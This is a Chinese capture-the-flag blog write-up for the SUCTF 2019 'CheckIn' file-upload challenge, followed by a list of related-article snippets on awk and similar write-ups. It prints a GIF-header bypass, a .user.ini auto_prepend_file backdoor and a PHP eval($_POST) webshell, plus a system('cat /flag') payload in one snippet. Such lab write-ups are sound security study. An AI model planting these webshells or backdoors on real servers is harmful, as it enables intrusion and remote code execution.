[SUCTF 2019]CheckIn

最新推荐文章于 2023-09-16 17:31:33 发布
最新推荐文章于 2023-09-16 17:31:33 发布
阅读量171 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43152809/article/details/108834289
版权

[SUCTF 2019]CheckIn

在这里插入图片描述

在首页给了一个github网址,点击进入
在这里插入图片描述

在src里面发现了index.php
index.php是关于文件上传的过滤规则
可以看到,使用exif_imagetype()函数对传上来的文件进行了判断
在这里插入图片描述

可以使用文件头 GIF 89a进行绕过
在writeup里面找到了README.md,给了一个提示 .user.ini
根据他的提示,去查了.user.ini的资料
链接在这里:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html
简单来说,就是可以使用.user.ini文件来包含任意一个文件,并且让他执行
那么
首先创建一个.user.ini文件
内容为:

GIF 89a
auto_prepend_file=01.gif

将它上传到服务器
随后创建一个01.gif,这个名字应该与.user.ini包含文件的名字相同
内容

GIF89a
<script language="php">eval($_POST['123']);</script>

将两个文件分别上传到服务器
在这里插入图片描述

url为:
http://25ad103c-0d31-47b1-9ade-4b5a8cf59798.node3.buuoj.cn/
uploads/04b0951938d905b41348c1548f9c338b/index.php
随后使用蚁剑进行连接
在这里插入图片描述
在这里插入图片描述

flag为
flag{262c0abb-a92e-4deb-91fd-a1cfc50e5471}
在这里插入图片描述

CSAPP 二进制炸弹 binary bomb lab 1 第一关 ——深入理解计算机系统
Eternitykc的博客
11-25 1263
CSAPP bomb lab1 Phase_1 1.phase_1主函数: 0000000000400ee0 <phase_1>: 400ee0: 48 83 ec 08 sub $0x8,%rsp 400ee4: be 00 24 40 00 mov $0x402400,%esi 400ee9: e8 4a 04 00 00 callq 401338 <strings_not_equal> #call一个比较
awk 内嵌正则 提取字符串_常用awk加正则提取字符串
weixin_35572076的博客
12-24 593
grep'[Aa]aa'filename#过滤出包含有Aaaa或者aaaa的一行grep'[A-Z]'filename#包含至少一个大写字母的行grep-w'[tT]est'filename包含单词和test的行.#forcePATTERNtomatchonlywholewordsgrep-s'kensun'filename#找到包含kensun的行,但不打...
awk 内嵌正则 提取字符串_awk正则表达式和内置函数的使用方法实例详解
weixin_36124888的博客
12-24 1220
awk正则表达式及内置函数实例详解:1、模糊匹配:awk ‘{if($3~/97/) print $0}' data.f:如果第三项中含有”97”则打印该行awk ‘{if($4!~/ufcx/) print $0}' data.f:如果第三项中不含ufcx有则打印2、精确匹配:awk ‘{if($5==66) print $0}' data.f:如果第五项是66则打印awk ‘{if($5!=6...
awk 使用正则表达式提取关键字
sfgoidhodfgioji的博客
09-16 849
未作特别说明,一般指gawk,gawk 是 AWK 的 GNU 版本。awk虽然很强大 但是有些高级功能还是非常少,需要手扣代码 写方法。如果不想安装 其他版本的awk 就只能自行手扣关键字搜索了。可以提取数字 浮点数 指定内容字符串 正则表达式可以自定义。awk 有3个不同版本: awk、nawk和gawk,ubuntu 自带的gawk 可以用的功能比较鸡肋。
awk 入门指南
热门推荐
在此立一个IT职业上的flag:https://github.com/Zeb-D/my-review
01-08 1万+
本文章来源于:https://github.com/Zeb-D/my-review ,请star 强力支持,你的支持,就是我的动力。 [TOC] 背景 awk是处理文本文件的一个应用程序,几乎所有 Linux 系统都自带这个程序。 它依次处理文件的每一行,并读取里面的每一个字段。对于日志、CSV 那样的每行格式相同的文本文件,awk可能是最方便的工具。 awk其实不仅仅是工具软件,还是一种编程语...
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6667
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
[SUCTF 2019] web题-CheckIn
BROTHERYY的博客
07-07 662
复现环境:buuoj.cn 尝试了各种上传绕过的方法,但依然还是不行,看了下其他大佬的wp,茅塞顿开,也说明我太菜了。 写入保存将ctf.txt改为ctf.jpg auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件 auto_append_file 表示在php代码执行完毕后加载指定的php文件 自定义的.user,ini先执行auto_prepend_file函数,auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件,也就是先加
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2557
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
SUCTF 2019 CheckIn 作题有感
qq_46184013的博客
04-15 741
一.SUCTF 2019 CheckIn 刚开始打开这道题以为只是一道普通的文件上传, 先是试了试php一句话木马,提示 这里显示 是对<?进行过滤了 这时候想到可以换一种方法,用 <script language='php'>system('cat /flag');</script>对<?进行替换。 但发现还是不行,出现这个界面。 我是小白也不懂这个啊,去...
[SUCTF 2019]CheckIn 1
最新发布
01-12
### SUCTF 2019 CheckIn 题目解析 #### 背景介绍 SUCTF 2019 的 `CheckIn` 是一道 Web 安全题目,主要考察参赛者对于文件上传漏洞的理解以及如何绕过后端的安全检测机制。 #### 文件上传安全检测 在该题目中,...
linux正则表达式awk详解
10-23
主要介绍了linux正则表达式awk的相关资料,需要的朋友可以参考下
awk 内嵌正则 提取字符串_正则表达式+awk,sed提取任意匹配的内容并输出!
weixin_42134338的博客
01-14 3114
一直觉得要达到在shell中随意匹配、提取任何指定范围的字符串,是需要很深的功夫才能做到的。(注意,只要匹配到的内容而不要同在一行的任何其他无关的内容)以前时间过的,多是grep -E -o(缺点是一次只能匹配输出一个模式或者分组,多个非连续的模式匹配则不行),cut -d" " -f 2,tr -s "\n" " ",awk '{ $1 ~ /os_v/}' (缺点是很多时候你根本不知道哪个域...
awk 内嵌正则 提取字符串_awk权威指南之 终结篇!
weixin_39766071的博客
11-30 301
前段时间看了一下awk的使用选项,字段变量,标准变量,操作运算符,正则表达式,数组和控制流,并且也附带着一些相关的案例,总的来说,在深入了解和使用AWK之后,还是带来了很多的便利,在处理文本的文件的时候提供了更多的思路和便捷,比如按需自定义打印文本显示格式,进行一些简单的数据处理,同时awk还有和shell,python,go一些编程语言类似的循环,条件,逻辑处理,以及一些内置的函数更方...
常用awk加正则提取字符串
weixin_33739646的博客
03-27 7800
grep'[Aa]aa'filename #过滤出包含有Aaaa或者aaaa的一行 grep'[A-Z]'filename #包含至少一个大写字母的行grep-w'[tT]est'filename包含单词和test的行. #forcePATTERNtomatchonlywholewords grep-s'kensun'filename...
awk使用正则截取数据
sz66cm 学习随笔
04-24 1943
awk使用正则截取数据需求数据源如下shell代码注意点 需求 通过awk 截取ping 命令的结果的时间返回值,通过返回值的大小控制打印大于3ms的结果显示; 数据源如下 64 bytes from 192.168.2.119: icmp_seq=24 ttl=64 time=4.157 ms shell代码 ping 192.168.2.18 | awk '{times_part=$7; match(times_part, "[0-9]+");times=substr(times_part, RS
【Python练习cookbook】文件操作,I/O
Code_LT的博客
08-29 370
file对象使用:https://docs.python.org/zh-cn/3.7/library/io.html#module-io 关键函数: open(file,mode='r',buffering=-1,encoding=None,errors=None,newline=None,closefd=True,opener=None) 打开file并返回对应的file object。如果该文件不能打开,则触发OSError。 从流中读取输入时,如果newlin...
[SUCTF 2019]CheckIn 1 学习笔记
weixin_45869407的博客
10-15 464
刚刚做到这道题的时候以为就只是一个简答的文件上传,结果发现自己上传的图片马被拦截了,发现不能有<?符合,然后改成,但最后不知道该怎么弄,无奈自己太菜,只能看大佬writeup(做题不是关键) ...
awk的正则表达式提取
weixin_33670786的博客
01-28 4490
假设有文件内容如下,我想提取红笔部分{fileid:148909, lineno:1} : 日本 湘南 地区 夜里 海边 出现 校服 高中生 他们 开始 聊天 烟火 手机 纪念 他们 湘南 当地 名牌 高中 学生 目前 正值 紧迫 高中三年级 暑假 前夕 开始 投入 恐怖 考试 他们 迎接 自己 毕业 典礼 明天 开始 他们 高中生 考试 今天 集会 高中 生活 告别 仪式 ...
awk正则
东城绝神
06-09 706
awk正则
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值